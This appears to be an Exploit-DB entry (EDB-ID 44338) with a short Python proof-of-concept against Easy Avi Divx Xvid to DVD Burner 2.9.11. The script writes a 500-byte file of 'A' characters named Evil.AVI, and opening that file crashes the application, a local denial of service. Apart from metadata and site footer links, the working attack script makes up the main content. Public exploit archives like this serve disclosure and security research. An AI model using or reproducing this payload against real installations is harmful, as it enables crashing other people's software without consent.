Easy Avi Divx Xvid to DVD Burner 2.9.11 - '.avi' Denial of Service

EDB-ID:

44338

CVE:

N/A

EDB Verified:

Author:

Hashim Jawad

Type:

dos

Exploit: /

Platform:

Windows

Published:

2018-03-23

Vulnerable App:

#!/usr/bin/python
###########################################################################################
# Exploit Title      : Easy Avi Divx Xvid to DVD Burner v2.9.11 - Local Denial of Service #
# Exploit Author     : Hashim Jawad                                                       #
# Twitter            : @ihack4falafel                                                     # 
# Author Website     : ihack4falafel[.]com                                                #
# Vendor Homepage    : http://www.divxtodvd.net/index.htm                                 #
# Vulnerable Software: http://www.divxtodvd.net/easy_divx_to_dvd.exe                      #
# Tested on OS       : Windows XP professional SP3                                        #
#                      Windows 10 professional 64-bit                                     #
# Steps to reproduce : Add Evil.AVI and BOOM!                                             #
###########################################################################################

buffer = "A" * 500

try:
	f=open("Evil.AVI","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except:
	print "File cannot be created"

Tags: Denial of Service (DoS) Local

Advisory/Source: Link

Downloads	Certifications	Training	Professional Services
Kali Linux	OSCP	Penetration Testing with Kali Linux (PWK)	Penetration Testing
Kali NetHunter	OSWP	Advanced Web Attacks and Exploitation (AWAE)	Advanced Attack Simulation
Kali Linux Revealed Book	OSCE	Offensive Security Wireless Attacks (WiFu)	Application Security Assessment
	OSEE	Cracking the Perimeter (CTP)
	OSWE	Metasploit Unleashed (MSFU)
	KLCP	Free Kali Linux Training